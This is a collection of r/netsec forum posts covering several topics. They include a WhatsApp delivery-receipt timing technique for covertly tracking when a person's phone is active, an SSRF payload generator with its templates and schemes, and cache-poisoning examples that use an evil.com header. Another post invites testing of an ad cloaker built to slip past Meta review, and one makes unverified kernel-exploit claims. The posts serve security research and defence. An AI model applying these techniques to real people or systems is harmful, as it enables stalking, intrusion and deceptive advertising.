I’ve been playing with the “Careless Whisper” side-channel idea and hacked together a small PoC that shows how you can track a phone’s device activity state (screen on/off, offline) via WhatsApp – without any notifications or visible messages on the victim’s side.
How it works (very roughly):
- uses WhatsApp via an unofficial API
- sends tiny “probe” reactions to special/invalid message IDs
- WhatsApp still sends back silent delivery receipts
- I just measure the round-trip time (RTT) of those receipts
From that, you start seeing patterns like:
- low RTT ≈ screen on / active, usually on Wi-Fi
- a bit higher RTT ≈ screen on / active, on mobile data
- high RTT ≈ screen off / standby on Wi-Fi
- very high RTT ≈ screen off / standby on mobile data / bad reception
- timeouts / repeated failures ≈ offline (airplane mode, no network, etc.)
*depends on device
The target never sees any message, notification or reaction. The same class of leak exists for Signal as well (per the original paper).
In theory you’d still see this in raw network traffic (weird, regular probe pattern), and on the victim side it will slowly burn through a bit more mobile data and battery than “normal” idle usage.
Over time you can use this to infer behavior:
- when someone is probably at home (stable Wi-Fi RTT)
- when they’re likely sleeping (long standby/offline stretches)
- when they’re out and moving around (mobile data RTT patterns)
So in theory you can slowly build a profile of when a person is home, asleep, or out — and this kind of tracking could already be happening without people realizing it.
Quick “hotfix” for normal users:
Go into the privacy settings of WhatsApp and Signal and turn off / restrict that unknown numbers can message you (e.g. WhatsApp: Settings → Privacy → Advanced). The attack basically requires that someone can send stuff to your number at all – limiting that already kills a big chunk of the risk.
My open-source implementation (research / educational use only): https://github.com/gommzystudio/device-activity-tracker
Original Paper:
https://arxiv.org/abs/2411.11194
I've been experimenting with a CDP-based technique for tracing the origin of JavaScript values inside modern, framework-heavy SPAs.
The method, called Breakpoint-Driven Heap Search (BDHS), performs step-out-based debugger pauses, captures a heap snapshot at each pause, and searches each snapshot for a target value (object, string, primitive, nested structure, or similarity signature).
It identifies the user-land function where the value first appears, avoiding framework and vendor noise via heuristics.
Alongside BDHS, I also implemented a Live Object Search that inspects the live heap (not just snapshots), matches objects by regex or structure, and allows runtime patching of matched objects.
This is useful for analyzing bot-detection logic, state machines, tainted values, or any internal object that never surfaces in the global scope.
Potential use cases: SPA reverse engineering, DOM XSS investigations, taint analysis, anti-bot logic tracing, debugging minified/obfuscated flows, and correlating network payloads with memory structures.
Hi, during my work as a pentester, we have developed internal tooling for different types of tests. We thought it would be helpful to release a web version of our SSRF payload generator which has come in handy many times.
It is particularly useful for testing PDF generators when HTML tags may be inserted in the final document. We're aiming for a similar feel to PortSwigger's XSS cheat sheet. The generator includes various payload types for different SSRF scenarios with multiple encoding options.
It works by combining different features like schemes (dict:, dns:, file:, gopher:, etc...) with templates (<img src="{u}">, <meta http-equiv="refresh" content="0;url={u}">, etc...), and more stuff like local files, static hosts. The result is a large amount of payloads to test.
Enter your target URL for callbacks, "Generate Payloads" then copy everything to the clipboard and paste into Burp. Note that there are a number of predefined hosts as well like 127.0.0.1.
No tracking or ads on the site, everything is client-side.
Best Regards!
Edit: holy s**t the embed image is large
AI/LLM Red Team Handbook and Field Manual
I've published a handbook for penetration testing AI systems and LLMs: https://cph-sec.gitbook.io/ai-llm-red-team-handbook-and-field-manual
Contents:
Target audience: pentesters, red teamers, and security researchers assessing AI-integrated applications, chatbots, and LLM implementations.
Open to feedback and contributions from the community.
Often, beginners and even experienced phishers confuse the approach they are using when phishing, often resulting in failing campaigns and bad results. I did a little writeup to describe each approach.
Rolling out a small research utility I have been building. It provides a simple way to look up proof-of-concept exploit links associated with a given CVE. It is not a vulnerability database. It is a discovery surface that points directly to the underlying code. Anyone can test it, inspect it, or fold it into their own workflow.
A small rate limit is in place to stop automated scraping. The limit is visible at:
https://labs.jamessawyer.co.uk/cves/api/whoami
An API layer sits behind it. A CVE query looks like:
curl -i "https://labs.jamessawyer.co.uk/cves/api/cves?q=CVE-2025-0282"
The Web Ui is
Most open-source L7 DDoS mitigation and bot-protection approaches rely on challenges (e.g., CAPTCHA or JavaScript proof-of-work) or static rules based on the User-Agent, Referer, or client geolocation. These techniques are increasingly ineffective, as they are easily bypassed by modern open-source impersonation libraries and paid cloud proxy networks.
We explore a different approach: classifying HTTP client requests in near real time using ClickHouse as the primary analytics backend.
We collect access logs directly from Tempesta FW, a high-performance open-source hybrid of an HTTP reverse proxy and a firewall. Tempesta FW implements zero-copy per-CPU log shipping into ClickHouse, so the dataset growth rate is limited only by ClickHouse bulk ingestion performance - which is very high.
WebShield, a small open-source Python daemon:
periodically executes analytic queries to detect spikes in traffic (requests or bytes per second), response delays, surges in HTTP error codes, and other anomalies;
upon detecting a spike, classifies the clients and validates the current model;
if the model is validated, automatically blocks malicious clients by IP, TLS fingerprints, or HTTP fingerprints.
To simplify and accelerate classification — whether automatic or manual — we introduced a new TLS fingerprinting method.
WebShield is a small and simple daemon, yet it is effective against multi-thousand-IP botnets.
The full article with configuration examples, ClickHouse schemas, and queries.
Hey everyone, listen I'm going to use AI to explain all this just a heads up but the deal is I patented a thesis and I was testing it out on Google's bug bounty program. I proved my work true.
What happened I couldn't believe. Total systematical kernal failure! I found 15 vulnerabilities in 5 hours. I turned them into Google and demanded escalation. They closes every single one of them as frivolous. The thing is I have the patented solution for there failure.Any way I've been working on a deeply unstable process interaction that appears to leverage several non-atomic file operations within the Linux VFS (Virtual File System) layer. The initial finding focused on a classic Local Privilege Escalation (LPE) Race Condition, but further analysis revealed about 15 different patterns where similar non-atomic functions could be exploited under specific high-stress timing conditions. The core issue seems to stem from a fundamental architectural oversight where certain file security checks and subsequent critical operations (rename, chown, etc.) are not treated as a single, uninterruptible transaction (an atomic operation). My Situation & Mitigation I have developed a full Proof-of-Concept (PoC) for the most critical LPE. I have implemented an aggressive, real-time countermeasure (a Time Slice Watchdog) on my own systems to detect and block the exploitation attempt based on abnormal CPU time usage during the race window. This mitigation is currently running successfully. I have detailed technical documentation explaining the root cause, the affected functions, and the required kernel-level mitigation (using atomic primitives). The Critical Question: Where is the best place to submit this?
Hi guys, I created this synthetic dataset of HTTP requests that are either benign or malicious. I am looking for some feedback on the contents of this dataset and how to make it useful for real world cases.
Questions regarding netsec and discussion related directly to netsec are welcome here, as is sharing tool links.
As always, the content & discussion guidelines should also be observed on r/netsec.
Feedback and suggestions are welcome, but don't post it here. Please send it to the moderator inbox.
Hey everyone, if you manage cloud infrastructure, Kubernetes, or container workloads and use tools like CSPM / CNAPP / runtime protection / WAF / IDS, you probably hope they catch real attacks. But how if they work under real-world conditions?
That’s where ARMO CTRL comes in: it’s a free, controlled attack lab that helps you simulate real web-to-cloud attacks, and validate whether your security stack actually detects them
What it does
Hi everyone,
I've been doing a deep dive into Cache Poisoning to understand how the vulnerability class has evolved over the last decade.
While modern attacks involve complex gadgets and framework confusion, I realized that to truly understand them, you have to look at the "Foundational" attacks—the early logic flaws that started it all.
I analyzed 8 historical case studies from public bug bounty reports. Here are the 3 most interesting patterns that paved the way for modern exploitation:
1. The HackerOne Classic (2014)
X-Forwarded-Host header without validation.X-Forwarded-Host: evil.com caused the application to generate a redirect to the attacker's domain.2. GitHub's Content-Type DoS
Content-Type headers differently for the cache vs. the backend.3. The Cloudflare Capitalization Bug
TaRgEt.CoM to target.com for the cache key), but the origin server treated them as distinct.Why this matters today: Even though these are "old" reports, these exact logic flaws (normalization issues, unkeyed headers) are what cause the complex CP-DoS and secondary-context attacks we see in modern frameworks like Next.js today.
I wrote a full breakdown of all 8 case studies (including Shopify, GitLab, and Red Hat) if you want to see the specific request/response pairs.
Read the Full Analysis (Part 1)
Let me know if you have any questions about the mechanics of these early bugs!
Just came across this reverse engineering challenge called Malware Busters seems to be part of the Cloud Security Championship. It’s got a nice malware analysis vibe, mostly assembly focused and pretty clean in terms of setup.
Was surprised by the polish has anyone else given it a try?
An anonymized real-world case study on multi-source analysis (firmware, IaC, FMS, telemetry, network traffic, web stack) using CAI + MCP.
This writeup details innovative ‘syntax confusion’ techniques exploiting how two or more components can interpret the same input differently due to ambiguous or inconsistent syntax rules.
Alex Brumen aka Brumens provides step-by-step guidance, supported by practical examples, on crafting payloads to confuse syntaxes and parsers – enabling filter bypasses and real-world exploitation.
This research was originally presented at NahamCon 2025.
Author here.
Zero the Hero (0tH) is a Mach-O structural analysis tool written in Rust.
It parses FAT binaries, load commands, slices, CodeSignature/SuperBlob, DER entitlements, requirements bytecode, and CodeDirectory versions.
The binary is universal (Intel + ARM64), notarized and stapled.
Motivation: existing tools lack full coverage of modern Mach-O signature internals.
Docs: https://zero-the-hero.run/docs
Happy to discuss signature internals or Mach-O specifics.
Think prepared statements automatically make your Node.js apps secure? Think again.
In my latest blog post, I explore a surprising edge case in the mysql and mysql2 packages that can turn “safe” prepared statements into exploitable SQL injection vulnerabilities.
If you use Node.js and rely on prepared statements (as you should be!), this is a must-read: https://blog.mantrainfosec.com/blog/18/prepared-statements-prepared-to-be-vulnerable
My talk about Lateral Movement in the context of logged in user sessions 🙌
Curious what frameworks people use for desktop application testing. I run a pentesting firm that does thick clients for enterprise, and we couldn't find anything comprehensive for this.
Ended up building DASVS over the past 5 years - basically ASVS but for desktop applications. Covers desktop-specific stuff like local data storage, IPC security, update mechanisms, and memory handling that web testing frameworks miss. Been using it internally for thick client testing, but you can only see so much from one angle. Just open-sourced it because it could be useful beyond just us.
The goal is to get it to where ASVS is: community-driven, comprehensive, and actually used.
To people who do desktop application testing, what is wrong or missing? Where do you see gaps that should be addressed? In the pipeline, we have testing guides per OS and an automated assessment tool inspired by MobSF. What do you use now for desktop application testing? And what would make a framework like this actually useful?
Hi everyone,
I'm sharing a new open-source tool I developed: the Ephemeral Vulnerability Scanner.
If you're tired of using security tools that require you to send sensitive lists of your installed software to a 3rd party server, this is your solution.
dpkg -l, brew list) to generate a local inventory.json file.index.html in your browser.The core benefit is privacy: Your inventory never leaves your control. Analysis is ephemeral—everything is gone when you close the tab.
It supports Windows, Linux, and macOS, giving you a unified, free way to scan packages across your fleet.
Feedback and contributions are highly welcome!
We've just released a tool that fixes a particularly annoying problem for those trying to fuzz HTTP/3.
The issue is that QUIC is designed to prevent network bottlenecks (HOL blocking), which is beneficial, but it disrupts the fundamental timing required for exploiting application-level race conditions. We tried all the obvious solutions, but QUIC's RFC essentially blocks fragmentation and other low-level network optimizations. 🤷♂️
So, we figured out a way to synchronize things at the QUIC stream layer using a technique we call Quic-Fin-Sync.
The gist:
This one packet forces the server to "release" all the requests into processing near-simultaneously. It worked way better than existing methods in our tests—we successfully raced a vulnerable Keycloak setup over 40 times.
If you are pentesting HTTP/3, grab the open-source tool and let us know what you break with it. The full write-up is below.
What’s the most frustrating thing you’ve run into trying to test QUIC/HTTP/3?
Hey bro 👾
Wanna take on a friendly challenge?
I built a cloaker that’s been flying under Meta’s radar — and I want to see if you can break it.
The challenge is simple:
🧠 Try to identify any vulnerabilities or leaks in the cloaker system I’m using.
🚀 If you manage to break it or point out a real flaw, I’ll send you a little prize (or maybe a project if you impress me).
Hint:
The ad on Meta shows one thing...
But the landing page is completely different from the advertised offer.
Let’s see if you’re sharp enough to catch it 😏
Game on?
Hi all,
I’ve published a technical case study analyzing a design issue in how the Binance API enforces IP whitelisting. This is not about account takeover or fund theft — it’s about a trust-boundary mismatch between the API key and the secondary listenKey used for WebSocket streams.
This is not a direct account compromise.
It’s market-intelligence leakage, which can be extremely valuable when aggregated across many users or bot frameworks.
Many users rely on IP whitelisting as their final defensive barrier. The listenKey silently bypasses that assumption. This creates a false sense of security and enables unexpected data exposure patterns that users are not aware of.
I responsibly reported this and waited ~11 months.
The issue was repeatedly categorized as “social engineering,” despite clear architectural implications. Therefore, I have published the analysis openly.
Shai-Hulud second attack analysis: Over 300 NPM Packages and 21K Github Repos infected via Fake Bun Runtime Within Hours